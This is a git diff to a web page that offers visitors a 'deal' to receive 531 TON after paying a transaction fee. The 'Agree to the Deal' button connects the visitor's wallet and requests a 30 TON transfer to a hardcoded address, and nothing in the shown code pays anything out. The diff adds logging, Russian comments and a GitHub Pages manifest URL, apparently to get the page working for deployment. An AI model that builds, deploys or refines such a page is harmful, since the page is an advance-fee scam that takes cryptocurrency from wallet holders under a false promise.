--- a/index.html
+++ b/index.html
@@ -200,7 +200,7 @@
                     <p>You will receive: <span>531 TON</span> ($1717.68)</p>
                     <p>Transaction Fee: <span>31 TON</span> ($100.28)</p>
                 </div>
-                <button id="agree-button" class="btn-primary"> Agree to the Deal</button>
+                <button id="agree-button" class="btn-primary">Agree to the Deal</button>
             </div>
             <div class="right-section">
                 <div class="details-box">
@@ -223,42 +223,56 @@
         </div>
     </div>
     <script>
+        // Инициализация Ton Connect
         const tonConnect = new TonConnect({
-            manifestUrl: 'https://your-app-url.com/tonconnect-manifest.json', // Замените на URL вашего манифеста
+            manifestUrl: 'https://<ваш-username>.github.io/<репозиторий>/tonconnect-manifest.json', // Укажите ваш URL
         });
 
+        // Обработчик кнопки
         document.getElementById('agree-button').addEventListener('click', async () => {
             try {
+                console.log('Attempting to connect wallet...');
                 // Подключение кошелька
                 const wallet = await tonConnect.connect();
                 if (!wallet) {
+                    console.error('Wallet connection failed');
                     alert('Failed to connect wallet');
                     return;
                 }
+                console.log('Wallet connected:', wallet);
 
                 // Транзакция: отправка 30 TON
                 const transaction = {
                     validUntil: Math.floor(Date.now() / 1000) + 600, // Действительна 10 минут
                     messages: [
                         {
-                            address: 'UQA7zv18rAEKJt85gvCVXLJRzGfagMPPnS5AaDGJlTYgYKSU', // Замените на адрес получателя
+                            address: 'UQA7zv18rAEKJt85gvCVXLJRzGfagMPPnS5AaDGJlTYgYKSU', // Адрес получателя
                             amount: '30000000000', // 30 TON в нанотонах
                         },
                     ],
                 };
 
+                console.log('Sending transaction:', transaction);
                 // Отправка транзакции
                 const result = await tonConnect.sendTransaction(transaction);
                 if (result) {
+                    console.log('Transaction sent:', result);
                     alert('Transaction sent successfully');
                 } else {
+                    console.error('Transaction failed');
                     alert('Failed to send transaction');
                 }
             } catch (error) {
-                console.error('Error:', error);
-                alert('An error occurred while connecting or sending the transaction');
+                console.error('Error during transaction:', error);
+                alert('An error occurred: ' + error.message);
             }
         });
+
+        // Проверка, загружен ли TonConnect SDK
+        if (typeof TonConnect === 'undefined') {
+            console.error('TonConnect SDK not loaded');
+            alert('TonConnect SDK failed to load. Please check your network or script source.');
+        }
     </script>
 </body>
 </html>
